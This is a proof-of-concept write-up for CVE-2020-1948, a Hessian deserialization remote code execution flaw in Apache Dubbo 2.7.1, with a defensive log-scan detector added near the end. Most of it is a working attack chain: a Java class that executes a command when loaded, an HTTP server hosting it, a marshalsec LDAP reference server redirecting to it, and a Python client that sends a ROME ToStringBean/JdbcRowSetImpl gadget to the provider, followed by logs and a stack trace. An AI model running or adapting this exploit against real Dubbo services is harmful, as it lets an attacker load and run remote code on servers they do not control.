[CVE-2020-1948] Apache Dubbo Provider default deserialization RCE

git clone https://github.com/apache/dubbo-spring-boot-project
cd dubbo-spring-boot-project
git checkout 2.7.1 -b b2.7.1

# Import the whole dubbo-spring-boot-project into IDEA

In dubbo-spring-boot-samples/auto-configure-samples/provider-sample/pom.xml, add the following dependency:

        <dependency>
            <groupId>com.rometools</groupId>
            <artifactId>rome</artifactId>
            <version>1.7.0</version>
        </dependency>

Change the default port in dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/resources/application.properties to 12347.

ExploitMac.java

public class ExploitMac {
    public ExploitMac() {
        try {
            // Launches Calculator as a visible proof that the class was loaded and executed
            java.lang.Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
        } catch (java.io.IOException e) {
            e.printStackTrace();
        }
    }
}

terminal 1

[~/Downloads]$ cat ExploitMac.java                                                                                                [23:55:12]
public class ExploitMac{public ExploitMac(){try{java.lang.Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");}catch(java.io.IOException e){e.printStackTrace();}}}
[~/Downloads]$ vi ExploitMac.java                                                                                                 [23:43:04]
[~/Downloads]$ javac ExploitMac.java                                                                                              [23:43:17]
[~/Downloads]$ python3 -m http.server 8088                                                                                        [23:43:19]
zsh: correct 'http.server' to 'httpserver' [nyae]? n
Serving HTTP on 0.0.0.0 port 8088 (http://0.0.0.0:8088/) ...

127.0.0.1 - - [23/Jun/2020 23:49:27] "GET /ExploitMac.class HTTP/1.1" 200 -

terminal 2

[master][~/GitProjects/marshalsec]$ java -cp ./target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8088/#ExploitMac 8087
Listening on 0.0.0.0:8087
Send LDAP reference result for ExploitMac redirecting to http://127.0.0.1:8088/ExploitMac.class

terminal 3

$ python3 -m pip install dubbo-py
$ python3 dubbo3.py

PoC

from dubbo.codec.hessian2 import new_object
from dubbo.client import DubboClient

# Provider listening on the port configured above
client = DubboClient('127.0.0.1', 12347)

# JdbcRowSetImpl whose dataSource points at the LDAP reference server from terminal 2
JdbcRowSetImpl = new_object(
    'com.sun.rowset.JdbcRowSetImpl',
    dataSource="ldap://127.0.0.1:8087/ExploitMac",
    strMatchColumns=["foo"],
)
JdbcRowSetImplClass = new_object(
    'java.lang.Class',
    name="com.sun.rowset.JdbcRowSetImpl",
)
# ROME ToStringBean: its toString() invokes every getter of obj, including getDatabaseMetaData()
toStringBean = new_object(
    'com.rometools.rome.feed.impl.ToStringBean',
    beanClass=JdbcRowSetImplClass,
    obj=JdbcRowSetImpl,
)

# The method does not need to exist: the provider stringifies the invocation while building its error message
resp = client.send_request_and_return_response(
    service_name='org.apache.dubbo.spring.boot.demo.consumer.DemoService',
    method_name='rce',
    args=[toStringBean],
)

Error shown in the IDEA console

2020-06-23 23:49:27.073 ERROR 66497 --- [12347-thread-17] c.rometools.rome.feed.impl.ToStringBean  : Error while generating toString

java.lang.reflect.InvocationTargetException: null
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) ~[na:1.8.0_131]
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62) ~[na:1.8.0_131]
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[na:1.8.0_131]
	at java.lang.reflect.Method.invoke(Method.java:498) ~[na:1.8.0_131]
	at com.rometools.rome.feed.impl.ToStringBean.toString(ToStringBean.java:158) [rome-1.7.0.jar:1.7.0]
	at com.rometools.rome.feed.impl.ToStringBean.toString(ToStringBean.java:129) [rome-1.7.0.jar:1.7.0]
	at java.lang.String.valueOf(String.java:2994) [na:1.8.0_131]
	at java.util.Arrays.toString(Arrays.java:4571) [na:1.8.0_131]
	at org.apache.dubbo.rpc.RpcInvocation.toString(RpcInvocation.java:211) [dubbo-2.7.1.jar:2.7.1]
	at java.lang.String.valueOf(String.java:2994) [na:1.8.0_131]
	at java.lang.StringBuilder.append(StringBuilder.java:131) [na:1.8.0_131]
	at org.apache.dubbo.rpc.protocol.dubbo.DubboProtocol.getInvoker(DubboProtocol.java:248) [dubbo-2.7.1.jar:2.7.1]
	at org.apache.dubbo.rpc.protocol.dubbo.DubboProtocol$1.reply(DubboProtocol.java:102) [dubbo-2.7.1.jar:2.7.1]
	at org.apache.dubbo.remoting.exchange.support.header.HeaderExchangeHandler.handleRequest(HeaderExchangeHandler.java:103) [dubbo-2.7.1.jar:2.7.1]
	at org.apache.dubbo.remoting.exchange.support.header.HeaderExchangeHandler.received(HeaderExchangeHandler.java:200) [dubbo-2.7.1.jar:2.7.1]
	at org.apache.dubbo.remoting.transport.DecodeHandler.received(DecodeHandler.java:51) [dubbo-2.7.1.jar:2.7.1]
	at org.apache.dubbo.remoting.transport.dispatcher.ChannelEventRunnable.run(ChannelEventRunnable.java:57) [dubbo-2.7.1.jar:2.7.1]
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) [na:1.8.0_131]
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617) [na:1.8.0_131]
	at java.lang.Thread.run(Thread.java:748) [na:1.8.0_131]
Caused by: java.sql.SQLException: JdbcRowSet (連接) JNDI 無法連接
	at com.sun.rowset.JdbcRowSetImpl.connect(JdbcRowSetImpl.java:634) ~[na:1.8.0_131]
	at com.sun.rowset.JdbcRowSetImpl.getDatabaseMetaData(JdbcRowSetImpl.java:4004) ~[na:1.8.0_131]
	... 20 common frames omitted
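Defender-side check, added here and not part of the original post: a log scan that flags the provider-side signature of this chain, the ROME ToStringBean error co-occurring with DubboProtocol.getInvoker and JdbcRowSetImpl.connect frames, run over a constructed sample modelled on the trace above.

```python
import re

# Constructed sample log, modelled on the provider output shown above (message text shortened)
SAMPLE_LOG = """\
2020-06-23 23:40:01.000 INFO 66497 --- [main] o.a.d.c.b.DubboBootstrap : provider started
2020-06-23 23:49:27.073 ERROR 66497 --- [12347-thread-17] c.rometools.rome.feed.impl.ToStringBean  : Error while generating toString
java.lang.reflect.InvocationTargetException: null
\tat com.rometools.rome.feed.impl.ToStringBean.toString(ToStringBean.java:158) [rome-1.7.0.jar:1.7.0]
\tat org.apache.dubbo.rpc.RpcInvocation.toString(RpcInvocation.java:211) [dubbo-2.7.1.jar:2.7.1]
\tat org.apache.dubbo.rpc.protocol.dubbo.DubboProtocol.getInvoker(DubboProtocol.java:248) [dubbo-2.7.1.jar:2.7.1]
Caused by: java.sql.SQLException: JdbcRowSet (connect) JNDI unable to connect
\tat com.sun.rowset.JdbcRowSetImpl.connect(JdbcRowSetImpl.java:634) ~[na:1.8.0_131]
2020-06-23 23:50:00.000 WARN 66497 --- [12347-thread-18] o.a.d.r.p.d.DubboProtocol : unrelated warning
"""

# A Spring Boot log entry starts with a timestamp; stack-trace lines are continuations of it
ENTRY_START = re.compile(r"^\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3} ")
THREAD = re.compile(r" --- \[([^\]]+)\] ")

# Frames from the chain in the trace above: ROME toString -> Dubbo invoker lookup -> JNDI via JdbcRowSetImpl
INDICATORS = {
    "rome_tostringbean": "com.rometools.rome.feed.impl.ToStringBean.toString(",
    "dubbo_getinvoker": "org.apache.dubbo.rpc.protocol.dubbo.DubboProtocol.getInvoker(",
    "jdbcrowset_jndi": "com.sun.rowset.JdbcRowSetImpl.connect(",
}

def split_entries(text):
    """Group raw lines into log entries (first line plus its stack trace)."""
    entry = []
    for line in text.splitlines():
        if ENTRY_START.match(line) and entry:
            yield "\n".join(entry)
            entry = []
        entry.append(line)
    if entry:
        yield "\n".join(entry)

def detect(text):
    """Return one finding per entry where the ROME toString error co-occurs with a Dubbo or JNDI frame."""
    findings = []
    for entry in split_entries(text):
        hits = [name for name, frame in INDICATORS.items() if frame in entry]
        if "rome_tostringbean" in hits and len(hits) >= 2:
            m = THREAD.search(entry)
            findings.append({"time": entry[:23], "thread": m.group(1) if m else None, "indicators": hits})
    return findings
```

A single finding of this shape means a request with a gadget argument reached the provider, whether or not the outbound JNDI connection succeeded.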

Wireshark: 8087

[screenshot]

Wireshark: 12347

[screenshot]

Demo

[screenshot]

References

  • https://mp.weixin.qq.com/s/iKQbdWrMG00Arg0aEUbrXQ
  • https://www.mail-archive.com/[email protected]/msg06544.html